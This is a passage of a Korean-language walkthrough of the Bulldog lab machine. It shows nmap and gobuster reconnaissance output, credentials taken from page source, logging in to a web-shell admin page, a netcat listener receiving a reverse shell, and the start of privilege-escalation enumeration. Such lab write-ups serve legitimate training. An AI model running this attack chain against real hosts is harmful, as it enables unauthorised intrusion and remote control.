네트워크 탐색 및 호스트 감지
초기 단계에서 네트워크 내 활성화된 시스템을 식별하기 위해 다음과 같은 명령어를 사용했다.
sudo nmap -sn 192.168.122.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:45 EST
Nmap scan report for 192.168.122.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.122.2
Host is up (0.000099s latency).
MAC Address: 00:50:56:FE:B5:1F (VMware)
Nmap scan report for 192.168.122.141
Host is up (0.00015s latency).
MAC Address: 00:0C:29:FC:BE:B4 (VMware)
Nmap scan report for 192.168.122.254
Host is up (0.000091s latency).
MAC Address: 00:50:56:E9:8C:A1 (VMware)
Nmap scan report for 192.168.122.139
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.02 seconds
포트 스캔 수행
감지된 호스트에 대해 포트 오픈 상태를 확인하기 위해 전체 포트 범위를 검사했다.
sudo nmap --min-rate 10000 -p- 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:46 EST
Nmap scan report for 192.168.122.141
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:FC:BE:B4 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
상세 서비스 분석
오픈된 포트들에 대해 상세한 서비스 정보를 수집하고 운영체제 추정을 수행했다.
sudo nmap -sT -sV -sC -O -p23,80,8080 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:46 EST
Nmap scan report for 192.168.122.141
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
|_http-server-header: WSGIServer/0.1 Python/2.7.12
MAC Address: 00:0C:29:FC:BE:B4 (VMware)
UDP 취약점 스캔
TCP 외 UDP 프로토콜의 취약한 포트들을 확인하기 위한 검사다.
sudo nmap -sU --top-ports 20 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:47 EST
Nmap scan report for 192.168.122.141
Host is up (0.00082s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:FC:BE:B4 (VMware)
HTTP 서비스 분석
웹 서버에 대한 취약점 조사를 수행하여 잠재적인 공격 경로를 식별한다.
sudo nmap --script=vuln -p23,80,8080 192.168.122.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-11 04:48 EST
Nmap scan report for 192.168.122.141
Host is up (0.00034s latency).
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
|http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http://ha.ckers.org/slowloris/
|http-csrf: Couldn't find any CSRF vulnerabilities.
|http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-fileupload-exploiter:
| Couldn't find a file-type field.
| Couldn't find a file-type field.
| http-enum:
| /robots.txt: Robots file
| /dev/: Potentially interesting folder
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
디렉터리 열거
Gobuster 도구를 활용해 숨겨진 웹 디렉터리를 찾아내는 작업을 수행한다.
sudo gobuster dir -u http://192.168.122.141 -x txt,php,rar,zip,tar,sql -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.122.141
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,rar,zip,tar,sql
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> http://192.168.122.141/admin/]
/dev (Status: 301) [Size: 0] [--> http://192.168.122.141/dev/]
/robots.txt (Status: 200) [Size: 1071]
웹 애플리케이션 탐색
/robots.txt 파일과 /admin, /dev 디렉터리를 조사하여 추가 정보를 수집한다.
인증 정보 획득
웹 소스 코드 분석을 통해 다음의 사용자 계정 정보를 발견한다.
nick:bulldog
sarah:bulldoglover
백도어 접근
발견된 인증 정보를 사용해 백도어 관리자 페이지에 로그인하여 웹 셸(Webshell)을 찾는다.
역방향 쉘 연결
Netcat을 사용하여 역방향 쉘을 확보하고 시스템에 접근한다.
sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.122.139] from (UNKNOWN) [192.168.122.141] 44294
bash: cannot set terminal process group (993): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$
시스템 정보 수집
권한 상승을 위한 시스템 정보를 수집한다.
django@bulldog:/home/django/bulldog$ whoami
whoami
django
django@bulldog:/home/django/bulldog$ uname -a
uname -a
Linux bulldog 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
django@bulldog:/home/django/bulldog$ ip a
ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:fc:be:b4 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.141/24 brd 192.168.122.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fefc:beb4/64 scope link
valid_lft forever preferred_lft forever
권한 상승 준비
현재 사용자 권한과 시스템 구성을 확인한다.
django@bulldog:/home/django/bulldog$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
django@bulldog:/home/django/bulldog$ cd /home
cd /home
django@bulldog:/home$ ls
ls
bulldogadmin